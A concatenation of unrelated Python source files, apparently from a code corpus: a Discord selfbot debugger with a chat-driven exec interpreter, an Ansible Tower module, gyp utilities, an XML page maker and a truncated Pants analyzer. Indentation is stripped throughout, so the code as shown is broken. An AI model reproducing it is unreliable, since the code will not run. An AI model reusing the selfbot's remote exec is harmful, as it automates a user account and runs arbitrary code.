from cogs.utils.checks import *
from contextlib import redirect_stdout
# Common imports that can be used by the debugger.
import requests
import json
import gc
import datetime
import time
import traceback
import prettytable
import re
import io
import asyncio
import discord
import random
import subprocess
from bs4 import BeautifulSoup
import urllib
import psutil
'''Module for the python interpreter as well as saving, loading, viewing, etc. the cmds/scripts ran with the interpreter.'''
class Debugger:
def __init__(self, bot):
self.bot = bot
self.stream = io.StringIO()
self.channel = None
self._last_result = None
def cleanup_code(self, content):
"""Automatically removes code blocks from the code."""
# remove ```py\n```
if content.startswith('```') and content.endswith('```'):
return '\n'.join(content.split('\n')[1:-1])
# remove `foo`
return content.strip('` \n')
# Executes/evaluates code.Pretty much the same as Rapptz implementation for RoboDanny with slight variations.
async def interpreter(self, env, code, ctx):
body = self.cleanup_code(code)
stdout = io.StringIO()
os.chdir(os.getcwd())
with open('%s/cogs/utils/temp.txt' % os.getcwd(), 'w') as temp:
temp.write(body)
to_compile = 'async def func():\n{}'.format(textwrap.indent(body, " "))
try:
exec(to_compile, env)
except Exception as e:
return await ctx.send('```\n{}: {}\n```'.format(e.__class__.__name__, e))
func = env['func']
try:
with redirect_stdout(stdout):
ret = await func()
except Exception as e:
value = stdout.getvalue()
await ctx.send('```\n{}{}\n```'.format(value, traceback.format_exc()))
else:
value = stdout.getvalue()
result = None
if ret is None:
if value:
result = '```\n{}\n```'.format(value)
else:
try:
result = '```\n{}\n```'.format(repr(eval(body, env)))
except:
pass
else:
self._last_result = ret
result = '```\n{}{}\n```'.format(value, ret)
if result:
if len(str(result)) > 1950:
url = PythonGists.Gist(description='Py output', content=str(result).strip("`"), name='output.txt')
result = self.bot.bot_prefix + 'Large output. Posted to Gist: %s' % url
await ctx.send(result)
else:
await ctx.send(result)
else:
await ctx.send("```\n```")
@commands.command(pass_context=True)
async def debug(self, ctx, *, option: str = None):
"""Shows useful informations to people that try to help you."""
try:
if embed_perms(ctx.message):
em = discord.Embed(color=0xad2929, title='\ud83e\udd16 Appu\'s Discord Selfbot Debug Infos')
system = ''
if sys.platform == 'linux':
system = subprocess.run(['uname', '-a'], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
if 'ubuntu' in system.lower():
system += '\n'+subprocess.run(['lsb_release', '-a'], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
elif sys.platform == 'win32':
try: platform
except: import platform
system = '%s %s (%s)'%(platform.system(), platform.version(), sys.platform)
else:
system = sys.platform
em.add_field(name='Operating System', value='%s' % system, inline=False)
try:
foo = subprocess.run("pip show discord.py", stdout=subprocess.PIPE)
_ver = re.search(r'Version: (\d+.\d+.\w+)', str(foo.stdout)).group(1)
except: _ver = discord.__version__
em.add_field(name='Discord.py Version', value='%s'%_ver)
em.add_field(name='PIP Version', value='%s'%pkg_resources.get_distribution('pip').version)
if os.path.exists('.git'):
try: em.add_field(name='Bot version', value='%s' % os.popen('git rev-parse --verify HEAD').read()[:7])
except: pass
em.add_field(name='Python Version', value='%s (%s)'%(sys.version,sys.api_version), inline=False)
if option and 'deps' in option.lower():
dependencies = ''
dep_file = sorted(open('%s/requirements.txt' % os.getcwd()).read().split("\n"), key=str.lower)
for dep in dep_file:
if not '==' in dep: continue
dep = dep.split('==')
cur = pkg_resources.get_distribution(dep[0]).version
if cur == dep[1]: dependencies += '\✅ %s: %s\n'%(dep[0], cur)
else: dependencies += '\❌ %s: %s / %s\n'%(dep[0], cur, dep[1])
em.add_field(name='Dependencies', value='%s' % dependencies)
cog_list = ["cogs." + os.path.splitext(f)[0] for f in [os.path.basename(f) for f in glob.glob("cogs/*.py")]]
loaded_cogs = [x.__module__.split(".")[1] for x in self.bot.cogs.values()]
unloaded_cogs = [c.split(".")[1] for c in cog_list if c.split(".")[1] not in loaded_cogs]
if option and 'cogs' in option.lower():
if len(loaded_cogs) > 0: em.add_field(name='Loaded Cogs ({})'.format(len(loaded_cogs)), value='\n'.join(sorted(loaded_cogs)), inline=True)
if len(unloaded_cogs) > 0: em.add_field(name='Unloaded Cogs ({})'.format(len(unloaded_cogs)), value='\n'.join(sorted(unloaded_cogs)), inline=True)
else: em.add_field(name='Cogs', value='{} loaded.\n{} unloaded'.format(len(loaded_cogs), len(unloaded_cogs)), inline=True)
if option and 'path' in option.lower():
paths = "\n".join(sys.path).strip()
if len(paths) > 300:
url = PythonGists.Gist(description='sys.path', content=str(paths), name='syspath.txt')
em.add_field(name='Import Paths', value=paths[:300]+' [(Show more)](%s)'%url)
else:
em.add_field(name='Import Paths', value=paths)
user = subprocess.run(['whoami'], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
if sys.platform == 'linux':
user += '@'+subprocess.run(['hostname'], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
em.set_footer(text='Generated at {:%Y-%m-%d %H:%M:%S} by {}'.format(datetime.datetime.now(), user))
try: await ctx.send(content=None, embed=em)
except discord.HTTPException as e:
await ctx.send(content=None, embed=em)
else:
await ctx.send('No permissions to embed debug info.')
except:
await ctx.send('``` %s ```'%format_exc())
@commands.group(pass_context=True, invoke_without_command=True)
async def py(self, ctx, *, msg):
"""Python interpreter. See the wiki for more info."""
if ctx.invoked_subcommand is None:
env = {
'bot': self.bot,
'ctx': ctx,
'channel': ctx.channel,
'author': ctx.author,
'guild': ctx.guild,
'server': ctx.guild,
'message': ctx.message,
'_': self._last_result
}
env.update(globals())
await self.interpreter(env, msg, ctx)
# Save last [p]py cmd/script.
@py.command(pass_context=True)
async def save(self, ctx, *, msg):
"""Save the code you last ran. Ex: [p]py save stuff"""
msg = msg.strip()[:-4] if msg.strip().endswith('.txt') else msg.strip()
os.chdir(os.getcwd())
if not os.path.exists('%s/cogs/utils/temp.txt' % os.getcwd()):
return await ctx.send(self.bot.bot_prefix + 'Nothing to save. Run a ``>py`` cmd/script first.')
if not os.path.isdir('%s/cogs/utils/save/' % os.getcwd()):
os.makedirs('%s/cogs/utils/save/' % os.getcwd())
if os.path.exists('%s/cogs/utils/save/%s.txt' % (os.getcwd(), msg)):
await ctx.send(self.bot.bot_prefix + '``%s.txt`` already exists. Overwrite? ``y/n``.' % msg)
reply = await self.bot.wait_for('message', check=lambda m: m.author == ctx.message.author and (m.content.lower() == 'y' or m.content.lower() == 'n'))
if reply.content.lower().strip() != 'y':
return await ctx.send(self.bot.bot_prefix + 'Cancelled.')
if os.path.exists('%s/cogs/utils/save/%s.txt' % (os.getcwd(), msg)):
os.remove('%s/cogs/utils/save/%s.txt' % (os.getcwd(), msg))
try:
shutil.move('%s/cogs/utils/temp.txt' % os.getcwd(), '%s/cogs/utils/save/%s.txt' % (os.getcwd(), msg))
await ctx.send(self.bot.bot_prefix + 'Saved last run cmd/script as ``%s.txt``' % msg)
except:
await ctx.send(self.bot.bot_prefix + 'Error saving file as ``%s.txt``' % msg)
# Load a cmd/script saved with the [p]save cmd
@py.command(aliases=['start'], pass_context=True)
async def run(self, ctx, *, msg):
"""Run code that you saved with the save commmand. Ex: [p]py run stuff parameter1 parameter2"""
# Like in unix, the first parameter is the script name
parameters = msg.split()
save_file = parameters[0] # Force scope
if save_file.endswith('.txt'):
save_file = save_file[:-(len('.txt'))] # Temptation to put '.txt' in a constant increases
else:
parameters[0] += '.txt' # The script name is always full
if not os.path.exists('%s/cogs/utils/save/%s.txt' % (os.getcwd(), save_file)):
return await ctx.send(self.bot.bot_prefix + 'Could not find file ``%s.txt``' % save_file)
script = open('%s/cogs/utils/save/%s.txt' % (os.getcwd(), save_file)).read()
env = {
'bot': self.bot,
'ctx': ctx,
'channel': ctx.channel,
'author': ctx.author,
'guild': ctx.guild,
'server': ctx.guild,
'message': ctx.message,
'_': self._last_result,
'argv': parameters
}
env.update(globals())
await self.interpreter(env, script, ctx)
# List saved cmd/scripts
@py.command(aliases=['ls'], pass_context=True)
async def list(self, ctx, txt: str = None):
"""List all saved scripts. Ex: [p]py list or [p]py ls"""
try:
if txt:
numb = txt.strip()
if numb.isdigit():
numb = int(numb)
else:
await ctx.send(self.bot.bot_prefix + 'Invalid syntax. Ex: ``>py list 1``')
else:
numb = 1
filelist = glob.glob('cogs/utils/save/*.txt')
if len(filelist) == 0:
return await ctx.send(self.bot.bot_prefix + 'No saved cmd/scripts.')
filelist.sort()
msg = ''
pages = int(math.ceil(len(filelist) / 10))
if numb < 1:
numb = 1
elif numb > pages:
numb = pages
for i in range(10):
try:
msg += filelist[i + (10 * (numb-1))][16:] + '\n'
except:
break
await ctx.send(self.bot.bot_prefix + 'List of saved cmd/scripts. Page ``%s of %s`` ```%s```' % (numb, pages, msg))
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Error, something went wrong: ``%s``' % e)
# View a saved cmd/script
@py.group(aliases=['vi', 'vim'], pass_context=True)
async def view(self, ctx, *, msg: str):
"""View a saved script's contents. Ex: [p]py view stuff"""
msg = msg.strip()[:-4] if msg.strip().endswith('.txt') else msg.strip()
try:
if os.path.isfile('cogs/utils/save/%s.txt' % msg):
f = open('cogs/utils/save/%s.txt' % msg, 'r').read()
await ctx.send(self.bot.bot_prefix + 'Viewing ``%s.txt``: ```py\n%s```' % (msg, f.strip('` ')))
else:
await ctx.send(self.bot.bot_prefix + '``%s.txt`` does not exist.' % msg)
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Error, something went wrong: ``%s``' % e)
# Delete a saved cmd/script
@py.group(aliases=['rm'], pass_context=True)
async def delete(self, ctx, *, msg: str):
"""Delete a saved script. Ex: [p]py delete stuff"""
msg = msg.strip()[:-4] if msg.strip().endswith('.txt') else msg.strip()
try:
if os.path.exists('cogs/utils/save/%s.txt' % msg):
os.remove('cogs/utils/save/%s.txt' % msg)
await ctx.send(self.bot.bot_prefix + 'Deleted ``%s.txt`` from saves.' % msg)
else:
await ctx.send(self.bot.bot_prefix + '``%s.txt`` does not exist.' % msg)
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Error, something went wrong: ``%s``' % e)
@commands.command(pass_context=True)
async def load(self, ctx, *, msg):
"""Load a module."""
await ctx.message.delete()
try:
if os.path.exists("custom_cogs/{}.py".format(msg)):
self.bot.load_extension("custom_cogs.{}".format(msg))
elif os.path.exists("cogs/{}.py".format(msg)):
self.bot.load_extension("cogs.{}".format(msg))
else:
raise ImportError("No module named '{}'".format(msg))
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Failed to load module: `{}.py`'.format(msg))
await ctx.send(self.bot.bot_prefix + '{}: {}'.format(type(e).__name__, e))
else:
await ctx.send(self.bot.bot_prefix + 'Loaded module: `{}.py`'.format(msg))
@commands.command(pass_context=True)
async def unload(self, ctx, *, msg):
"""Unload a module"""
await ctx.message.delete()
try:
if os.path.exists("cogs/{}.py".format(msg)):
self.bot.unload_extension("cogs.{}".format(msg))
elif os.path.exists("custom_cogs/{}.py".format(msg)):
self.bot.unload_extension("custom_cogs.{}".format(msg))
else:
raise ImportError("No module named '{}'".format(msg))
except Exception as e:
await ctx.send(self.bot.bot_prefix + 'Failed to unload module: `{}.py`'.format(msg))
await ctx.send(self.bot.bot_prefix + '{}: {}'.format(type(e).__name__, e))
else:
await ctx.send(self.bot.bot_prefix + 'Unloaded module: `{}.py`'.format(msg))
@commands.command(pass_context=True)
async def loadall(self, ctx):
"""Loads all core modules"""
await ctx.message.delete()
errors = ""
for cog in os.listdir("cogs"):
if ".py" in cog:
cog = cog.replace('.py', '')
try:
self.bot.load_extension("cogs.{}".format(cog))
except Exception as e:
errors += 'Failed to load module: `{}.py` due to `{}: {}`\n'.format(cog, type(e).__name__, e)
if not errors:
await ctx.send(self.bot.bot_prefix + "All core modules loaded")
else:
await ctx.send(self.bot.bot_prefix + errors)
@commands.command(pass_context=True)
async def redirect(self, ctx):
"""Redirect STDOUT and STDERR to a channel for debugging purposes."""
sys.stdout = self.stream
sys.stderr = self.stream
self.channel = ctx.message.channel
await ctx.send(self.bot.bot_prefix + "Successfully redirected STDOUT and STDERR to the current channel!")
@commands.command(pass_context=True)
async def unredirect(self, ctx):
"""Redirect STDOUT and STDERR back to the console for debugging purposes."""
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
self.channel = None
await ctx.send(self.bot.bot_prefix + "Successfully redirected STDOUT and STDERR back to the console!")
async def redirection_clock(self):
await self.bot.wait_until_ready()
while self is self.bot.get_cog("Debugger"):
await asyncio.sleep(0.2)
stream_content = self.stream.getvalue()
if stream_content and self.channel:
await self.channel.send("```" + stream_content + "```")
self.stream = io.StringIO()
sys.stdout = self.stream
sys.stderr = self.stream
def setup(bot):
debug_cog = Debugger(bot)
loop = asyncio.get_event_loop()
loop.create_task(debug_cog.redirection_clock())
bot.add_cog(debug_cog)
| gpl-3.0 |
albertomurillo/ansible | lib/ansible/modules/web_infrastructure/ansible_tower/tower_inventory_source.py | 38 | 11320 | #!/usr/bin/python
# coding: utf-8 -*-
# Copyright: (c) 2018, Adrien Fleury <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: tower_inventory_source
author: "Adrien Fleury (@fleu42)"
version_added: "2.7"
short_description: create, update, or destroy Ansible Tower inventory source.
description:
- Create, update, or destroy Ansible Tower inventories source. See
U(https://www.ansible.com/tower) for an overview.
options:
name:
description:
- The name to use for the inventory source.
required: True
description:
description:
- The description to use for the inventory source.
inventory:
description:
- The inventory the source is linked to.
required: True
source:
description:
- Types of inventory source.
choices:
- file
- scm
- ec2
- gce
- azure
- azure_rm
- vmware
- satellite6
- cloudforms
- openstack
- rhv
- tower
- custom
required: True
credential:
description:
- Credential to use to retrieve the inventory from.
source_vars:
description:
- >-
The source_vars allow to Override variables found in the source config
file. For example with Openstack, specifying *private: false* would
change the output of the openstack.py script. It has to be YAML or
JSON.
timeout:
description:
- Number in seconds after which the Tower API methods will time out.
source_project:
description:
- Use a *project* as a source for the *inventory*.
source_path:
description:
- Path to the file to use as a source in the selected *project*.
update_on_project_update:
description:
- >-
That parameter will sync the inventory when the project is synced. It
can only be used with a SCM source.
type: bool
source_regions:
description:
- >-
List of regions for your cloud provider. You can include multiple all
regions. Only Hosts associated with the selected regions will be
updated. Refer to Ansible Tower documentation for more detail.
instance_filters:
description:
- >-
Provide a comma-separated list of filter expressions. Hosts are
imported when all of the filters match. Refer to Ansible Tower
documentation for more detail.
group_by:
description:
- >-
Specify which groups to create automatically. Group names will be
created similar to the options selected. If blank, all groups above
are created. Refer to Ansible Tower documentation for more detail.
source_script:
description:
- >-
The source custom script to use to build the inventory. It needs to
exist.
overwrite:
description:
- >-
If set, any hosts and groups that were previously present on the
external source but are now removed will be removed from the Tower
inventory. Hosts and groups that were not managed by the inventory
source will be promoted to the next manually created group or if
there is no manually created group to promote them into, they will be
left in the "all" default group for the inventory. When not checked,
local child hosts and groups not found on the external source will
remain untouched by the inventory update process.
type: bool
overwrite_vars:
description:
- >-
If set, all variables for child groups and hosts will be removed
and replaced by those found on the external source. When not checked,
a merge will be performed, combining local variables with those found
on the external source.
type: bool
update_on_launch:
description:
- >-
Each time a job runs using this inventory, refresh the inventory from
the selected source before executing job tasks.
type: bool
update_cache_timeout:
description:
- >-
Time in seconds to consider an inventory sync to be current. During
job runs and callbacks the task system will evaluate the timestamp of
the latest sync. If it is older than Cache Timeout, it is not
considered current, and a new inventory sync will be performed.
state:
description:
- Desired state of the resource.
default: "present"
choices: ["present", "absent"]
validate_certs:
description:
- Tower option to avoid certificates check.
type: bool
aliases: [ tower_verify_ssl ]
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- name: Add tower inventory source
tower_inventory_source:
name: Inventory source
description: My Inventory source
inventory: My inventory
credential: Devstack_credential
source: openstack
update_on_launch: true
overwrite: true
source_vars: '{ private: false }'
state: present
validate_certs: false
'''
RETURN = ''' # '''
from ansible.module_utils.ansible_tower import TowerModule, tower_auth_config, tower_check_mode
try:
import tower_cli
import tower_cli.exceptions as exc
from tower_cli.conf import settings
except ImportError:
pass
SOURCE_CHOICES = {
'file': 'Directory or Script',
'scm': 'Sourced from a Project',
'ec2': 'Amazon EC2',
'gce': 'Google Compute Engine',
'azure': 'Microsoft Azure',
'azure_rm': 'Microsoft Azure Resource Manager',
'vmware': 'VMware vCenter',
'satellite6': 'Red Hat Satellite 6',
'cloudforms': 'Red Hat CloudForms',
'openstack': 'OpenStack',
'rhv': 'Red Hat Virtualization',
'tower': 'Ansible Tower',
'custom': 'Custom Script',
}
def main():
argument_spec = dict(
name=dict(required=True),
description=dict(required=False),
inventory=dict(required=True),
source=dict(required=True,
choices=SOURCE_CHOICES.keys()),
credential=dict(required=False),
source_vars=dict(required=False),
timeout=dict(type='int', required=False),
source_project=dict(required=False),
source_path=dict(required=False),
update_on_project_update=dict(type='bool', required=False),
source_regions=dict(required=False),
instance_filters=dict(required=False),
group_by=dict(required=False),
source_script=dict(required=False),
overwrite=dict(type='bool', required=False),
overwrite_vars=dict(type='bool', required=False),
update_on_launch=dict(type='bool', required=False),
update_cache_timeout=dict(type='int', required=False),
state=dict(choices=['present', 'absent'], default='present'),
)
module = TowerModule(argument_spec=argument_spec, supports_check_mode=True)
name = module.params.get('name')
inventory = module.params.get('inventory')
source = module.params.get('source')
state = module.params.get('state')
json_output = {'inventory_source': name, 'state': state}
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
inventory_source = tower_cli.get_resource('inventory_source')
try:
params = {}
params['name'] = name
params['source'] = source
if module.params.get('description'):
params['description'] = module.params.get('description')
if module.params.get('credential'):
credential_res = tower_cli.get_resource('credential')
try:
credential = credential_res.get(
name=module.params.get('credential'))
params['credential'] = credential['id']
except (exc.NotFound) as excinfo:
module.fail_json(
msg='Failed to update credential source,'
'credential not found: {0}'.format(excinfo),
changed=False
)
if module.params.get('source_project'):
source_project_res = tower_cli.get_resource('project')
try:
source_project = source_project_res.get(
name=module.params.get('source_project'))
params['source_project'] = source_project['id']
except (exc.NotFound) as excinfo:
module.fail_json(
msg='Failed to update source project,'
'project not found: {0}'.format(excinfo),
changed=False
)
if module.params.get('source_script'):
source_script_res = tower_cli.get_resource('inventory_script')
try:
script = source_script_res.get(
name=module.params.get('source_script'))
params['source_script'] = script['id']
except (exc.NotFound) as excinfo:
module.fail_json(
msg='Failed to update source script,'
'script not found: {0}'.format(excinfo),
changed=False
)
try:
inventory_res = tower_cli.get_resource('inventory')
params['inventory'] = inventory_res.get(name=inventory)['id']
except (exc.NotFound) as excinfo:
module.fail_json(
msg='Failed to update inventory source, '
'inventory not found: {0}'.format(excinfo),
changed=False
)
for key in ('source_vars', 'timeout', 'source_path',
'update_on_project_update', 'source_regions',
'instance_filters', 'group_by', 'overwrite',
'overwrite_vars', 'update_on_launch',
'update_cache_timeout'):
if module.params.get(key) is not None:
params[key] = module.params.get(key)
if state == 'present':
params['create_on_missing'] = True
result = inventory_source.modify(**params)
json_output['id'] = result['id']
elif state == 'absent':
params['fail_on_missing'] = False
result = inventory_source.delete(**params)
except (exc.ConnectionError, exc.BadRequest, exc.AuthError) as excinfo:
module.fail_json(msg='Failed to update inventory source: \
{0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
if __name__ == '__main__':
main()
| gpl-3.0 |
ahsquared/arc | arc-assets/themes/ut-thehill/node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/pylib/gyp/MSVSUtil.py | 566 | 9386 | # Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility functions shared amongst the Windows generators."""
import copy
import os
_TARGET_TYPE_EXT = {
'executable': '.exe',
'loadable_module': '.dll',
'shared_library': '.dll',
}
def _GetLargePdbShimCcPath():
"""Returns the path of the large_pdb_shim.cc file."""
this_dir = os.path.abspath(os.path.dirname(__file__))
src_dir = os.path.abspath(os.path.join(this_dir, '..', '..'))
win_data_dir = os.path.join(src_dir, 'data', 'win')
large_pdb_shim_cc = os.path.join(win_data_dir, 'large-pdb-shim.cc')
return large_pdb_shim_cc
def _DeepCopySomeKeys(in_dict, keys):
"""Performs a partial deep-copy on |in_dict|, only copying the keys in |keys|.
Arguments:
in_dict: The dictionary to copy.
keys: The keys to be copied. If a key is in this list and doesn't exist in
|in_dict| this is not an error.
Returns:
The partially deep-copied dictionary.
"""
d = {}
for key in keys:
if key not in in_dict:
continue
d[key] = copy.deepcopy(in_dict[key])
return d
def _SuffixName(name, suffix):
"""Add a suffix to the end of a target.
Arguments:
name: name of the target (foo#target)
suffix: the suffix to be added
Returns:
Target name with suffix added (foo_suffix#target)
"""
parts = name.rsplit('#', 1)
parts[0] = '%s_%s' % (parts[0], suffix)
return '#'.join(parts)
def _ShardName(name, number):
"""Add a shard number to the end of a target.
Arguments:
name: name of the target (foo#target)
number: shard number
Returns:
Target name with shard added (foo_1#target)
"""
return _SuffixName(name, str(number))
def ShardTargets(target_list, target_dicts):
"""Shard some targets apart to work around the linkers limits.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
Returns:
Tuple of the new sharded versions of the inputs.
"""
# Gather the targets to shard, and how many pieces.
targets_to_shard = {}
for t in target_dicts:
shards = int(target_dicts[t].get('msvs_shard', 0))
if shards:
targets_to_shard[t] = shards
# Shard target_list.
new_target_list = []
for t in target_list:
if t in targets_to_shard:
for i in range(targets_to_shard[t]):
new_target_list.append(_ShardName(t, i))
else:
new_target_list.append(t)
# Shard target_dict.
new_target_dicts = {}
for t in target_dicts:
if t in targets_to_shard:
for i in range(targets_to_shard[t]):
name = _ShardName(t, i)
new_target_dicts[name] = copy.copy(target_dicts[t])
new_target_dicts[name]['target_name'] = _ShardName(
new_target_dicts[name]['target_name'], i)
sources = new_target_dicts[name].get('sources', [])
new_sources = []
for pos in range(i, len(sources), targets_to_shard[t]):
new_sources.append(sources[pos])
new_target_dicts[name]['sources'] = new_sources
else:
new_target_dicts[t] = target_dicts[t]
# Shard dependencies.
for t in new_target_dicts:
dependencies = copy.copy(new_target_dicts[t].get('dependencies', []))
new_dependencies = []
for d in dependencies:
if d in targets_to_shard:
for i in range(targets_to_shard[d]):
new_dependencies.append(_ShardName(d, i))
else:
new_dependencies.append(d)
new_target_dicts[t]['dependencies'] = new_dependencies
return (new_target_list, new_target_dicts)
def _GetPdbPath(target_dict, config_name, vars):
"""Returns the path to the PDB file that will be generated by a given
configuration.
The lookup proceeds as follows:
- Look for an explicit path in the VCLinkerTool configuration block.
- Look for an 'msvs_large_pdb_path' variable.
- Use '<(PRODUCT_DIR)/<(product_name).(exe|dll).pdb' if 'product_name' is
specified.
- Use '<(PRODUCT_DIR)/<(target_name).(exe|dll).pdb'.
Arguments:
target_dict: The target dictionary to be searched.
config_name: The name of the configuration of interest.
vars: A dictionary of common GYP variables with generator-specific values.
Returns:
The path of the corresponding PDB file.
"""
config = target_dict['configurations'][config_name]
msvs = config.setdefault('msvs_settings', {})
linker = msvs.get('VCLinkerTool', {})
pdb_path = linker.get('ProgramDatabaseFile')
if pdb_path:
return pdb_path
variables = target_dict.get('variables', {})
pdb_path = variables.get('msvs_large_pdb_path', None)
if pdb_path:
return pdb_path
pdb_base = target_dict.get('product_name', target_dict['target_name'])
pdb_base = '%s%s.pdb' % (pdb_base, _TARGET_TYPE_EXT[target_dict['type']])
pdb_path = vars['PRODUCT_DIR'] + '/' + pdb_base
return pdb_path
def InsertLargePdbShims(target_list, target_dicts, vars):
"""Insert a shim target that forces the linker to use 4KB pagesize PDBs.
This is a workaround for targets with PDBs greater than 1GB in size, the
limit for the 1KB pagesize PDBs created by the linker by default.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
vars: A dictionary of common GYP variables with generator-specific values.
Returns:
Tuple of the shimmed version of the inputs.
"""
# Determine which targets need shimming.
targets_to_shim = []
for t in target_dicts:
target_dict = target_dicts[t]
# We only want to shim targets that have msvs_large_pdb enabled.
if not int(target_dict.get('msvs_large_pdb', 0)):
continue
# This is intended for executable, shared_library and loadable_module
# targets where every configuration is set up to produce a PDB output.
# If any of these conditions is not true then the shim logic will fail
# below.
targets_to_shim.append(t)
large_pdb_shim_cc = _GetLargePdbShimCcPath()
for t in targets_to_shim:
target_dict = target_dicts[t]
target_name = target_dict.get('target_name')
base_dict = _DeepCopySomeKeys(target_dict,
['configurations', 'default_configuration', 'toolset'])
# This is the dict for copying the source file (part of the GYP tree)
# to the intermediate directory of the project. This is necessary because
# we can't always build a relative path to the shim source file (on Windows
# GYP and the project may be on different drives), and Ninja hates absolute
# paths (it ends up generating the .obj and .obj.d alongside the source
# file, polluting GYPs tree).
copy_suffix = 'large_pdb_copy'
copy_target_name = target_name + '_' + copy_suffix
full_copy_target_name = _SuffixName(t, copy_suffix)
shim_cc_basename = os.path.basename(large_pdb_shim_cc)
shim_cc_dir = vars['SHARED_INTERMEDIATE_DIR'] + '/' + copy_target_name
shim_cc_path = shim_cc_dir + '/' + shim_cc_basename
copy_dict = copy.deepcopy(base_dict)
copy_dict['target_name'] = copy_target_name
copy_dict['type'] = 'none'
copy_dict['sources'] = [ large_pdb_shim_cc ]
copy_dict['copies'] = [{
'destination': shim_cc_dir,
'files': [ large_pdb_shim_cc ]
}]
# This is the dict for the PDB generating shim target. It depends on the
# copy target.
shim_suffix = 'large_pdb_shim'
shim_target_name = target_name + '_' + shim_suffix
full_shim_target_name = _SuffixName(t, shim_suffix)
shim_dict = copy.deepcopy(base_dict)
shim_dict['target_name'] = shim_target_name
shim_dict['type'] = 'static_library'
shim_dict['sources'] = [ shim_cc_path ]
shim_dict['dependencies'] = [ full_copy_target_name ]
# Set up the shim to output its PDB to the same location as the final linker
# target.
for config_name, config in shim_dict.get('configurations').iteritems():
pdb_path = _GetPdbPath(target_dict, config_name, vars)
# A few keys that we don't want to propagate.
for key in ['msvs_precompiled_header', 'msvs_precompiled_source', 'test']:
config.pop(key, None)
msvs = config.setdefault('msvs_settings', {})
# Update the compiler directives in the shim target.
compiler = msvs.setdefault('VCCLCompilerTool', {})
compiler['DebugInformationFormat'] = '3'
compiler['ProgramDataBaseFileName'] = pdb_path
# Set the explicit PDB path in the appropriate configuration of the
# original target.
config = target_dict['configurations'][config_name]
msvs = config.setdefault('msvs_settings', {})
linker = msvs.setdefault('VCLinkerTool', {})
linker['GenerateDebugInformation'] = 'true'
linker['ProgramDatabaseFile'] = pdb_path
# Add the new targets. They must go to the beginning of the list so that
# the dependency generation works as expected in ninja.
target_list.insert(0, full_copy_target_name)
target_list.insert(0, full_shim_target_name)
target_dicts[full_copy_target_name] = copy_dict
target_dicts[full_shim_target_name] = shim_dict
# Update the original target to depend on the shim target.
target_dict.setdefault('dependencies', []).append(full_shim_target_name)
return (target_list, target_dicts) | gpl-2.0 |
wenqvip/pytuto | proj3/pagemaker.py | 1 | 1061 | __author__ = 'Spencer'
from xml.sax.handler import ContentHandler
from xml.sax import parse
class PageMaker(ContentHandler):
passthrough = False
def startElement(self, name, attrs):
if name == 'page':
self.passthrough = True
self.out = open(attrs['name'] + '.html', 'w')
self.out.write('<html><head>\n')
self.out.write('<title>%s</title>\n' % attrs['title'])
self.out.write('</head><body>\n')
elif self.passthrough:
self.out.write('<' + name)
for key, val in attrs.items():
self.out.write(' %s="%s"' % (key, val))
self.out.write('>')
def endElement(self, name):
if name == 'page':
self.passthrough = False
self.out.write('\n</body></html>\n')
self.out.close()
elif self.passthrough:
self.out.write('</%s>' % name)
def characters(self, content):
if self.passthrough:
self.out.write(content)
parse('website.xml', PageMaker()) | gpl-3.0 |
areitz/pants | src/python/pants/backend/jvm/tasks/jvm_compile/jvm_dependency_analyzer.py | 4 | 13065 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from collections import defaultdict
from twitter.common.collections import OrderedSet
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.jvm_target import JvmTarget
from pants.backend.jvm.targets.scala_library import ScalaLibrary
from pants.backend.jvm.tasks.ivy_task_mixin import IvyTaskMixin
from pants.base.build_environment import get_buildroot
from pants.base.build_graph import sort_targets
from pants.base.exceptions import TaskError
class JvmDependencyAnalyzer(object):
def __init__(self,
context,
check_missing_deps,
check_missing_direct_deps,
check_unnecessary_deps,
target_whitelist):
self._context = context
self._check_missing_deps = check_missing_deps
self._check_missing_direct_deps = check_missing_direct_deps
self._check_unnecessary_deps = check_unnecessary_deps
# These targets we will not report as having any dependency issues even if they do.
self._target_whitelist = OrderedSet(target_whitelist)
@classmethod
def prepare(clsc, options, round_manager):
round_manager.require_data('ivy_jar_products')
round_manager.require_data('ivy_resolve_symlink_map')
def _compute_targets_by_file(self):
"""Returns a map from abs path of source, class or jar file to an OrderedSet of targets.
The value is usually a singleton, because a source or class file belongs to a single target.
However a single jar may be provided (transitively or intransitively) by multiple JarLibrary
targets. But if there is a JarLibrary target that depends on a jar directly, then that
"canonical" target will be the first one in the list of targets.
"""
targets_by_file = defaultdict(OrderedSet)
# Multiple JarLibrary targets can provide the same (org, name).
jarlibs_by_id = defaultdict(set)
# Compute src -> target.
with self._context.new_workunit(name='map_sources'):
buildroot = get_buildroot()
# Look at all targets in-play for this pants run. Does not include synthetic targets,
for target in self._context.targets():
if isinstance(target, JvmTarget):
for src in target.sources_relative_to_buildroot():
targets_by_file[os.path.join(buildroot, src)].add(target)
elif isinstance(target, JarLibrary):
for jardep in target.jar_dependencies:
jarlibs_by_id[(jardep.org, jardep.name)].add(target)
